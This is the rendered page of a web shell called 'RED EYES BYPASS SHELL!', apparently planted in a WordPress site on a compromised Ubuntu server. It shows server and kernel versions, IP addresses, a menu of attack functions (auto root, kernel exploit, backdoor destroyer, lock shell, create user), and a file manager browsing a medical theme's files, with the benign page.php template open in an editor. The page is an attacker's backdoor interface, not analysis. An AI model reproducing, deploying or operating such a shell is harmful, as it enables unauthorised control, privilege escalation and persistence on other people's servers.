Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
human /
wp-content /
themes /
medihealth /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
include
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
sections
[ DIR ]
drwxr-xr-x
webfonts
[ DIR ]
drwxr-xr-x
archive.php
2.67
KB
-rwxr-xr-x
breadcrumb.php
451
B
-rwxr-xr-x
category.php
2.67
KB
-rwxr-xr-x
class-tgm-plugin-activation.php
120.18
KB
-rwxr-xr-x
comments.php
1.97
KB
-rwxr-xr-x
content-aside.php
1.77
KB
-rwxr-xr-x
content-gallery.php
1.77
KB
-rwxr-xr-x
content.php
2.39
KB
-rwxr-xr-x
custom-comments.php
2.52
KB
-rwxr-xr-x
footer.php
2.5
KB
-rwxr-xr-x
front-page.php
1.21
KB
-rwxr-xr-x
functions.php
9.71
KB
-rwxr-xr-x
header.php
5.19
KB
-rwxr-xr-x
index.php
4.45
KB
-rwxr-xr-x
page.php
4.27
KB
-rwxr-xr-x
readme.txt
7.38
KB
-rwxr-xr-x
screenshot.png
1.03
MB
-rwxr-xr-x
searchform.php
417
B
-rwxr-xr-x
sidebar-footer.php
689
B
-rwxr-xr-x
sidebar-woocommerce.php
188
B
-rwxr-xr-x
single.php
7.24
KB
-rwxr-xr-x
style.css
126.86
KB
-rwxr-xr-x
tag.php
2.62
KB
-rwxr-xr-x
woocommerce.php
828
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : page.php
<?php /** * Page * * @package MediHealth WordPress theme */ get_header(); ?> <!-- Breadcrumbs --> <?php $medihealth_breadcrumb = get_theme_mod('medihealth_breadcrumb_setting', '1'); if($medihealth_breadcrumb == '1') { get_template_part('breadcrumb'); } ?> <!-- Breadcrumbs --> <!-- Blog --> <section id="main-content" class="shop-section"> <div class="container"> <div class="row"> <!--Blog Section--> <?php // Page Layout Settings $page_layout = get_theme_mod('medihealth_page_layout','fullwidth'); // Initialize Variable $default_class = "col-md-12 col-sm-12 col-xs-12"; // Check Sidebar Column Condition if( $page_layout == "rightsidebar" || $page_layout == "leftsidebar" && is_active_sidebar( 'sidebar-widget' ) ) { $default_class = "col-md-8 col-sm-6 col-xs-12"; } ?> <?php if($page_layout == "leftsidebar") { ?> <?php if ( is_active_sidebar( 'sidebar-widget' ) ) { ?> <!--Sidebar Widget--> <div class="col-md-4 col-sm-6 col-xs-12"> <div class="sidebar"> <?php dynamic_sidebar('sidebar-widget') ?> </div> </div> <?php } } ?> <div class="<?php echo esc_html($default_class);?>"> <div class="blog_page page-style"> <?php if(have_posts()) : while (have_posts()) : the_post(); the_content(); endwhile; endif; ?> </div> </div> <!-- Right Sidebar Start --> <?php if($page_layout == "rightsidebar") { ?> <?php if ( is_active_sidebar( 'sidebar-widget' ) ) { ?> <!--Sidebar Widget--> <div class="col-md-4 col-sm-6 col-xs-12"> <div class="sidebar"> <?php dynamic_sidebar('sidebar-widget') ?> </div> </div> <?php } ?> <?php } ?> <!-- Right Sidebar End --> </div> </div> </section> <!-- Blog --> <!-- Comment Section --> <?php if( $post->comment_status == 'open' ) { ?> <section class="blog-comment-section"> <div class="container"> <div class="comment-blog"> <div class="row"> <?php if(have_posts()) : while (have_posts()) : the_post(); ?> <div class="col-md-6"> <div class="contact-fisrt-v"> <div class="med_head text-center"> <h4 class="services_head"><?php esc_html_e('Write Reviews', 'medihealth'); ?></h4> <h2 class="services_head1"><?php esc_html_e('Leave a Comment', 'medihealth'); ?></h2> <div class="head_line"></div> </div> <?php //get comments comments_template(); ?> </div> </div> <div class="col-md-6"> <div class="client-review"> <?php if( have_comments() ) { //We have comments ?> <!--<h2 class="comment-title"> <?php comments_number ( __('No Comments', 'medihealth'), __( 'One Comment', 'medihealth'), __('% Comments', 'medihealth') ); ?> </h2>--> <ul class="comment-list"> <?php $args = array ( 'walker' => null, 'type' => 'all', 'max_depth' => '4', 'style' => '', 'callback' => 'medihealth_custom_comments', 'end-callback' => null, 'type' => 'all', 'reply_text' => esc_html__('Reply', 'medihealth'), 'page' => null, 'per_page' => null, 'avatar_size' => 50, 'reverse_top_level' => null, 'reverse_children' => '', 'format' => 'html5', 'short_ping' => false, ); wp_list_comments( $args ); ?> </ul> <?php paginate_comments_links( array( 'prev_text' => __('«','medihealth'), 'next_text' => __('»','medihealth') ) ); if( !comments_open() && get_comments_number() ) { ?> <p class="no-comments"><?php esc_html_e('Comments are closed', 'medihealth'); ?></p> <?php } //comments open end } //have comments end ?> </div> </div> <?php endwhile; endif; // Reset Post Data wp_reset_postdata(); ?> </div> </div> </div> </section> <?php } ?> <!-- Comment Section --> <?php get_footer(); ?>
Close